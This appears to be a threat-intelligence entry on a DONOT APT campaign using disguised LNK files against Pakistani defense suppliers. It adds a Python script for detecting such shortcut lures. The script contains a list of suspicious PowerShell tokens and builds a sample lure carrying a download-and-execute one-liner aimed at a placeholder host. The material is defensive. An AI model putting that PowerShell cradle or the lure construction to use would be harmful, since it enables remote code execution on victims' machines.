
Attack On Maritime & Defense Manufacturing

Nov. 18, 2024, 9:03 p.m.

Description

The DONOT APT group has launched a campaign targeting Pakistani manufacturers that supply the maritime and defense sectors. The initial access vector is a malicious LNK file disguised as an RTF document; when opened it runs PowerShell commands that drop a decoy document and a stager. The stager persists through a scheduled task, talks to its command-and-control servers over encrypted channels, and can fetch additional payloads. Compared with earlier DONOT activity, the campaign shows improved encryption and payload-delivery methods. The malware collects detailed system information from the victim host and deletes itself when instructed. The operation illustrates the continued refinement of APT tradecraft and the need for defenses that cover the whole LNK-to-PowerShell chain, not just the final payload.
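The pivot of this chain is a shortcut that looks like a document. The following added example (written for this page; it is not DONOT's tooling and not code from the original report) parses the MS-SHLLINK header and StringData of a .lnk file and flags the traits such a lure exhibits: a document-looking double extension, a script-host target, a document application's icon on a script host, PowerShell arguments typical of a stager, and a non-default ShowCommand that keeps the window hidden. Both shortcuts it inspects are constructed in memory; the host example.invalid and the file names are placeholders.

```python
"""Triage a Windows shortcut (.lnk, MS-SHLLINK) for document-lure traits.
Added example; sample shortcuts are constructed, example.invalid is a placeholder."""
import struct

LNK_HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046 in its on-disk little-endian layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7   # 7 starts the window minimised, popular in lures

DOCUMENT_EXTS = (".rtf", ".doc", ".docx", ".pdf", ".xls", ".xlsx")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe",
                "mshta.exe", "wscript.exe", "cscript.exe")
DOCUMENT_APPS = ("wordpad.exe", "winword.exe", "excel.exe", "acrord32.exe")
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden",
                   "-ep bypass", "-executionpolicy bypass", "downloadstring",
                   "downloadfile", "iex", "invoke-expression", "schtasks")


def _read_string(data, pos, unicode):
    """StringData item: 2-byte CountCharacters, then that many characters."""
    (count,) = struct.unpack_from("<H", data, pos)
    pos += 2
    if unicode:
        return data[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
    return data[pos:pos + count].decode("cp1252", errors="replace"), pos + count


def parse_lnk(data):
    """Return LinkFlags, ShowCommand and the StringData fields of a shortcut."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize/CLSID)")
    (show_command,) = struct.unpack_from("<I", data, 0x3C)   # ShowCommand offset
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize does not include itself
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:                # LinkInfoSize includes itself
        (linkinfo_size,) = struct.unpack_from("<I", data, pos)
        pos += linkinfo_size
    unicode = bool(flags & IS_UNICODE)
    fields = {"flags": flags, "show_command": show_command}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            fields[key], pos = _read_string(data, pos, unicode)
    return fields


def triage_lnk(filename, data):
    """Parse the shortcut and return the lure indicators it matches, in order."""
    f = parse_lnk(data)
    findings = []
    lower_name = filename.lower()
    if lower_name.endswith(".lnk") and lower_name[:-4].endswith(DOCUMENT_EXTS):
        findings.append("double_extension")   # Report.rtf.lnk is shown as Report.rtf
    target = f.get("relative_path", "").lower().replace("/", "\\").rsplit("\\", 1)[-1]
    args, icon = f.get("arguments", "").lower(), f.get("icon_location", "").lower()
    if target in SCRIPT_HOSTS:
        findings.append("script_host_target")
        if icon.endswith(DOCUMENT_APPS):
            findings.append("document_icon_mismatch")   # script host wearing a document icon
    if any(token in args for token in SUSPICIOUS_ARGS):
        findings.append("suspicious_arguments")
    if f["show_command"] != SW_SHOWNORMAL:
        findings.append("hidden_window")
    return findings


def build_lnk(relative_path, arguments="", icon_location="", show_command=SW_SHOWNORMAL):
    """Assemble a minimal Unicode shortcut (constructed sample; no IDList/LinkInfo)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_ICON_LOCATION if icon_location else 0
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(t)) + t.encode("utf-16-le")
                    for t in (relative_path, arguments, icon_location) if t)
    return header + body


# Constructed lure in the shape described above: PowerShell target, stager-style
# arguments, WordPad icon, minimised window. The URL is a placeholder.
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage')\"",
    r"%SystemRoot%\system32\wordpad.exe", show_command=SW_SHOWMINNOACTIVE)
# Constructed benign shortcut for comparison.
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe",
                       icon_location=r"%SystemRoot%\system32\notepad.exe")

if __name__ == "__main__":
    for name, blob in (("Report.rtf.lnk", LURE_LNK), ("Notepad.lnk", BENIGN_LNK)):
        print(name, triage_lnk(name, blob) or ["clean"])
```

The parser walks the optional LinkTargetIDList and LinkInfo structures by their declared sizes rather than assuming they are absent, so it works on shortcuts written by Explorer as well as on the minimal ones built here; ExtraData after the StringData is ignored. On a mail gateway or in a sandbox, the same checks apply directly to an attachment's bytes, and a shortcut that triggers double_extension together with script_host_target is worth quarantining before any payload is fetched.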

Date

Published: Nov. 15, 2024, 6:35 p.m.

Created: Nov. 15, 2024, 6:35 p.m.

Modified: Nov. 18, 2024, 9:03 p.m.

Attack Patterns

DONOT

T1053.005 (Scheduled Task/Job: Scheduled Task)

T1218.011 (System Binary Proxy Execution: Rundll32)

T1059.003 (Command and Scripting Interpreter: Windows Command Shell)

T1059.001 (Command and Scripting Interpreter: PowerShell)

T1071.001 (Application Layer Protocol: Web Protocols)

T1070.004 (Indicator Removal: File Deletion)

T1105 (Ingress Tool Transfer)

T1027 (Obfuscated Files or Information)

T1041 (Exfiltration Over C2 Channel)

T1566 (Phishing)

Additional Information

Defense

Manufacturing

Pakistan